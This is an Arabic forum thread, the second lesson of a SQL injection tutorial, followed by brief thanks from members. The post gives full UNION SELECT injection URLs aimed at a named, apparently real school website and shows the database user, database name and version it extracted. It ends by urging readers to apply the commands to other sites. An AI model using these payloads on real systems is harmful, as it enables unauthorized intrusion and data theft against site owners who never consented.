[السلام عليكم ورحمة الله وبركاته الشرح مقدم للأخ هيثم وباقي اعضاء المنتدى الكريم كنت قد شرحت في درس الامس طريقة اكتشاف ثغرة سيكول (sql injection)...

jasem1

New Member
تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه
[
السلام عليكم ورحمة الله وبركاته
الشرح مقدم للأخ هيثم وباقي اعضاء المنتدى الكريم
كنت قد شرحت في درس الامس
طريقة اكتشاف ثغرة سيكول (sql injection)
====================
ووعدتكم بالانتقال الى مرحلة اخرى وهي اكتشاف العمود المصاب
وتطبيق بعض الاوامر عليه ...
====================
أما الدرس القادم والاخير غدا ان شاء الله
اعرف ان هناك شروحات مميزة للاخوة المحترفين وتفوق شرحي بكثير لكن انا اردت كسر الهوه بين المحترف والمبتدء
نبدأ على بركة الله....
لنأخذ الموقع التالي
HTML:
http://www.dsasummercamp.edu.gr/news.php?id=123
نريد ان نعرف ماهو الجدول المصاب والذي سوف نسحب من المعلومات
في الدرس السابق عرفنا ان عدد الجداول 5
وعندها سنستخدم الامر التالي :
كود:
union+select
عدد الجداول 5 كما قلنا فيصبح الامر على الشكل التالي
كود:
union+select+1,2,3,4,5--
اي ان الرابط يصبح على الشكل التالي
كود:
http://www.dsasummercamp.edu.gr/news.php?id=123+union+select+1,2,3,4,5--
وقلنا ان اشارة -- اخر الرابط كي تستجيب القاعده لامرنا
نضع هذا الرابط في المتصفح لنرى الجدول المصاب من بين هذه الجداول ال5 ....
وضعته لكن لم يظهر اي شيء
طيب ما الحل ؟!! الحل ان اضع اشارة - بعد ال=
يعني يصبح الرابط :
كود:
http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,2,3,4,5--
انظروا ماذا ظهر لي ... ?!
انظر الصورة :
3.png

ظهر لي الاعمده
2
4
5
يعني ان الجدول 2 و4 و5 مصابات ونستطيع سحب المعلومات من اي جدول نريده من بين هذه الجداول
والان دعونا نطبق بعض الاوامر
لمعرفة اسم المستخدم لهذه القاعده نضع
الامر التالي :

كود:
user()
مكان الجدول المصاب وليكن الجدول رقم 2
فيصبح الرابط على الشكل التالي
كود:
http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,user%28%29,3,4,5--
وظهر لنا : itis_dsa@localhost
انظر الصورة :
4.png

طيب نريد اسم القاعده فنضع الامر التالي مكان العمود المصاب
كود:
database()
فيصبح الرابط :
كود:
http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,database%28%29,3,4,5--
فظهر لنا :itis_dsa
طيب نريد ان نرى اصدار القاعده
نستخدم الامر التالي
كود:
version()
ليصبح الرابط على الشكل التالي
كود:
http://www.dsasummercamp.edu.gr/news.php?id=-123+union+select+1,version%28%29,3,4,5--
فظهر لنا الاصدار وهو :5.1.63
طيب اذا اردت الاستعلام عن الاصدار واسم المستخدم واسم القاعده استخدم هذا الامر
كود:
concat(user(),0x3a3a,database(),0x3a3a,version())
ماذا يعني هذا؟
هذا الامر concat لجمع عدة اوامر مع بعضها

0x3a3a
هذه العلامة سوف تفصل بين اسم القاعده واسم المستخدم والاصدار وهي مشفره بالهيكسس وتعني العلامة التاليه :
كود:
::

ماذا ظهر لي ؟
itis_dsa@localhost::itis_dsa::5.1.63
انظر الصورة :
5.png

اترك لكم الان التطبيق على عدد من المواقع وتطبيق هذه الاوامر للانتقال الى المرحله الاخيره
انتهى الدرس الثاني
استودعكم الله
لكم تحيات اخوكم the punisher​
 

topo18

New Member
تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه
رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه

merci khoya t le seul li kay3raf yfaham ta wa7ed mafhmt chkaydire hna mn ghirek merci
 
تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه
رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه

يعطيك العافية يابطل
 

mido spox

New Member
تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه
رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثانيه

merci Khoya bezzaf Lah Ir7am Lwalidin kamal
 
أعلى